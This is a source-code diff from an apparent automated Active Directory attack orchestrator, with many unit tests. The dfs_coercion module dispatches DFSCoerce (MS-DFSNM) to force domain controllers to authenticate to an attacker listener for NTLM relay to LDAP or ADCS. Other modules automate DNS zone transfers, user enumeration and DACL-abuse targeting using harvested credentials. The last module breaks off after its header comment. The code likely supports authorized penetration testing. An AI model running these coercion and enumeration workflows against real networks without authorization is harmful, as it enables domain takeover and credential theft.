collect_dacl_work(&state); + assert!(work.is_empty()); + } + + 
#[tokio::test] + async fn collect_source_user_empty_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let mut details = HashMap::new(); + details.insert("target".to_string(), serde_json::json!("victim")); + let vuln = make_vuln("vuln-fcp-004", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_matching_credential_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("otheruser", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-005", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_case_insensitive_credential_match() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("Admin", "CONTOSO.LOCAL")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-006", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].source_user, "admin"); + } + + #[tokio::test] + async fn collect_dc_ip_resolved_from_domain_controllers() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + 
.push(make_credential("admin", "contoso.local")); + state + .domain_controllers + .insert("contoso.local".to_string(), "192.168.58.10".to_string()); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-007", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + } + + #[tokio::test] + async fn collect_dc_ip_empty_when_no_dc_mapping() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-008", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, ""); + } + + #[tokio::test] + async fn collect_credential_domain_mismatch_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "fabrikam.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-009", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_empty_source_domain_matches_any_cred_domain() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "fabrikam.local")); + let mut details = HashMap::new(); + 
details.insert("source".to_string(), serde_json::json!("admin")); + details.insert("target".to_string(), serde_json::json!("victim")); + let vuln = make_vuln("vuln-fcp-010", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_multiple_vulns_produces_multiple_work_items() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + + for (i, vtype) in ["ForceChangePassword", "GenericAll", "WriteDacl"] + .iter() + .enumerate() + { + let details = acl_details("admin", &format!("target{i}"), "contoso.local"); + let vuln = make_vuln(&format!("vuln-multi-{i}"), vtype, details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 3); + } + + #[tokio::test] + async fn collect_dedup_key_format_matches() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-dk-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "dacl:vuln-dk-001"); + } + + #[tokio::test] + async fn collect_source_user_fallback_to_from_key() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("svc_account", "contoso.local")); + 
let mut details = HashMap::new(); + details.insert("from".to_string(), serde_json::json!("svc_account")); + details.insert("target".to_string(), serde_json::json!("victim")); + details.insert( + "source_domain".to_string(), + serde_json::json!("contoso.local"), + ); + let vuln = make_vuln("vuln-from-001", "GenericWrite", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].source_user, "svc_account"); + } + + #[tokio::test] + async fn collect_target_user_fallback_to_target_user_key() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let mut details = HashMap::new(); + details.insert("source".to_string(), serde_json::json!("admin")); + details.insert( + "target_user".to_string(), + serde_json::json!("fallback_target"), + ); + details.insert( + "source_domain".to_string(), + serde_json::json!("contoso.local"), + ); + let vuln = make_vuln("vuln-tu-001", "WriteDacl", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "fallback_target"); + } +} diff --git a/ares-cli/src/orchestrator/automation/dfs_coercion.rs b/ares-cli/src/orchestrator/automation/dfs_coercion.rs new file mode 100644 index 00000000..ad9bc889 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dfs_coercion.rs @@ -0,0 +1,450 @@ +//! auto_dfs_coercion -- trigger DFSCoerce (MS-DFSNM) NTLM coercion against DCs. +//! +//! DFSCoerce abuses the MS-DFSNM protocol (Distributed File System Namespace +//! Management) to force a DC to authenticate to an attacker listener. Unlike +//! 
PetitPotam, DFSCoerce requires valid domain credentials but works on +//! systems where PetitPotam's unauthenticated path has been patched. +//! +//! The captured NTLM auth can be relayed to LDAP (shadow creds, RBCD) or +//! ADCS web enrollment (ESC8). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect DFS coercion work items from current state. +/// +/// Pure logic extracted from `auto_dfs_coercion` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_dfs_coercion_work(state: &StateInner, listener: &str) -> Vec<DfsWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + if dc_ip.as_str() == listener { + continue; + } + + let dedup_key = format!("dfs_coerce:{dc_ip}"); + if state.is_processed(DEDUP_DFS_COERCION, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(DfsWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Dispatches DFSCoerce against each DC that hasn't been DFS-coerced. +/// Interval: 45s. +pub async fn auto_dfs_coercion(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("dfs_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec<DfsWork> = { + let state = dispatcher.state.read().await; + collect_dfs_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "dfs_coercion", + "target_ip": item.dc_ip, + "domain": item.domain, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("dfs_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "DFSCoerce (MS-DFSNM) coercion dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DFS_COERCION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DFS_COERCION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "DFSCoerce task deferred"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch DFSCoerce"); + } + } + } + } +} + +struct DfsWork { + dedup_key: String, + domain: String, + dc_ip: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::Credential; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin:
false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("dfs_coerce:{}", "192.168.58.10"); + assert_eq!(key, "dfs_coerce:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DFS_COERCION, "dfs_coercion"); + } + + #[test] + fn skips_self_listener() { + let dc_ip = "192.168.58.50"; + let listener = "192.168.58.50"; + assert_eq!(dc_ip, listener, "DC IP matching listener should be skipped"); + + let dc_ip2 = "192.168.58.10"; + assert_ne!(dc_ip2, listener, "Different IP should not be skipped"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "dfs_coercion", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "dfs_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let 
work = DfsWork { + dedup_key: "dfs_coerce:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "dfs_coerce:192.168.58.10"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn self_targeting_prevention() { + let listener = "192.168.58.50"; + let dc_ips = ["192.168.58.10", "192.168.58.50", "192.168.58.20"]; + + let non_self: Vec<&&str> = dc_ips.iter().filter(|ip| **ip != listener).collect(); + + assert_eq!(non_self.len(), 2); + assert!(!non_self.contains(&&"192.168.58.50")); + assert!(non_self.contains(&&"192.168.58.10")); + assert!(non_self.contains(&&"192.168.58.20")); + } + + #[test] + fn domain_extraction_for_credential_match() { + let domain = "contoso.local"; + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!( + cred_domain.to_lowercase(), + domain.to_lowercase(), + "Domain matching should be case-insensitive" + ); + + let domain2 = "fabrikam.local"; + assert_ne!( + cred_domain.to_lowercase(), + domain2.to_lowercase(), + "Different domains should not match" + ); + } + + // --- collect_dfs_coercion_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_dcs_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", 
"contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "dfs_coerce:192.168.58.10"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_dc_matching_listener() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.50".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), 
"192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + 
.push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/dns_enum.rs b/ares-cli/src/orchestrator/automation/dns_enum.rs new file mode 100644 index 00000000..8d3e5bc7 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dns_enum.rs @@ -0,0 +1,398 @@ +//! auto_dns_enum -- DNS zone transfer and record enumeration. +//! +//! Attempts AXFR zone transfers and enumerates DNS records (SRV, A, CNAME) +//! from each discovered DC. DNS records reveal additional hosts, services, +//! and naming conventions that port scanning alone may miss. +//! +//! Zone transfers are often allowed from domain-joined machines, and even +//! when blocked, DNS SRV record enumeration reveals AD-registered services +//! (e.g., _msdcs, _kerberos, _ldap, _gc, _http). 
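As an aside on the module doc comment above: the AD-registered SRV names it lists (_msdcs, _kerberos, _ldap, _gc) are conventionally derived from the domain name, which is why SRV enumeration still works when AXFR is refused. A minimal sketch, assuming a hypothetical helper `ad_srv_names` and an illustrative service subset (neither is part of this diff):

```rust
/// Build a few well-known AD SRV record names for a domain.
/// Illustrative subset only; the recon agent's actual query set may differ.
fn ad_srv_names(domain: &str) -> Vec<String> {
    let d = domain.to_lowercase(); // DNS names are case-insensitive
    vec![
        format!("_ldap._tcp.dc._msdcs.{d}"), // DC locator records
        format!("_kerberos._tcp.{d}"),       // KDCs
        format!("_gc._tcp.{d}"),             // global catalog
        format!("_kpasswd._tcp.{d}"),        // password-change service
    ]
}

fn main() {
    for name in ad_srv_names("CONTOSO.LOCAL") {
        println!("{name}");
    }
}
```

Resolving each name against the DC's own resolver then yields host and port data for AD services even without credentials.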
+ +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect DNS enumeration work items from current state. +/// +/// Pure logic extracted from `auto_dns_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_dns_enum_work(state: &StateInner) -> Vec<DnsEnumWork> { + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("dns_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_DNS_ENUM, &dedup_key) { + continue; + } + + // DNS enum can work without creds (zone transfer, SRV queries) + // but we pass creds if available for authenticated queries + let cred = state + .credentials + .iter() + .find(|c| !c.password.is_empty() && c.domain.to_lowercase() == domain.to_lowercase()) + .cloned(); + + items.push(DnsEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// DNS enumeration per domain. +/// Interval: 45s. +pub async fn auto_dns_enum(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("dns_enum") { + continue; + } + + let work: Vec<DnsEnumWork> = { + let state = dispatcher.state.read().await; + collect_dns_enum_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "dns_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + }); + + if let Some(ref cred) = item.credential { + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } + + let priority = dispatcher.effective_priority("dns_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "DNS enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DNS_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DNS_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "DNS enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch DNS enumeration"); + } + } + } + } +} + +struct DnsEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: Option<ares_core::models::Credential>, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("dns_enum:{}", "contoso.local"); + assert_eq!(key, "dns_enum:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("dns_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "dns_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DNS_ENUM, "dns_enum"); + } + + #[test] + fn no_cred_required() { + // DNS enum works without credentials for zone transfer / SRV queries + let cred: Option<ares_core::models::Credential> = None; + assert!(cred.is_none()); +
} + + #[test] + fn payload_without_cred() { + let payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + assert!(payload.get("credential").is_none()); + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + assert_eq!(payload["technique"], "dns_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn payload_with_credential() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let mut payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + payload["credential"] = serde_json::json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let work = DnsEnumWork { + dedup_key: "dns_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: None, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert!(work.credential.is_none()); + } + + #[test] + fn work_struct_with_credential() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + 
attack_step: 0, + }; + let work = DnsEnumWork { + dedup_key: "dns_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: Some(cred), + }; + assert!(work.credential.is_some()); + assert_eq!(work.credential.unwrap().username, "admin"); + } + + #[test] + fn dedup_key_domain_based() { + let domain1 = "contoso.local"; + let domain2 = "fabrikam.local"; + let key1 = format!("dns_enum:{}", domain1.to_lowercase()); + let key2 = format!("dns_enum:{}", domain2.to_lowercase()); + assert_ne!(key1, key2); + assert_eq!(key1, "dns_enum:contoso.local"); + assert_eq!(key2, "dns_enum:fabrikam.local"); + } + + #[test] + fn case_normalization_mixed() { + let key = format!("dns_enum:{}", "Contoso.Local".to_lowercase()); + assert_eq!(key, "dns_enum:contoso.local"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_dns_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_no_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + 
.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].credential.is_some()); + assert_eq!(work[0].credential.as_ref().unwrap().username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_DNS_ENUM, "dns_enum:contoso.local".into()); + let work = collect_dns_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_skips_empty_password_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + // Empty password cred should not be selected + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_cred_only_matches_same_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + // Cross-domain cred should NOT be selected (dns_enum only matches same domain) + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_dedup_key_lowercased() 
{ + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "dns_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert!(work[0].credential.is_some()); + } +} diff --git a/ares-cli/src/orchestrator/automation/domain_user_enum.rs b/ares-cli/src/orchestrator/automation/domain_user_enum.rs new file mode 100644 index 00000000..2dda9eb9 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/domain_user_enum.rs @@ -0,0 +1,436 @@ +//! auto_domain_user_enum -- explicit per-domain LDAP user enumeration. +//! +//! Unlike initial recon (which does broad DC scanning), this module dispatches +//! targeted LDAP user enumeration per domain using the best available credential. +//! This fills the gap where a trusted domain's users are not enumerated because +//! the initial recon agent only has primary-domain credentials. +//! +//! Dispatches `ldap_user_enumeration` to the recon role for each domain that +//! has a DC but hasn't been fully enumerated yet. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect user enumeration work items from current state. 
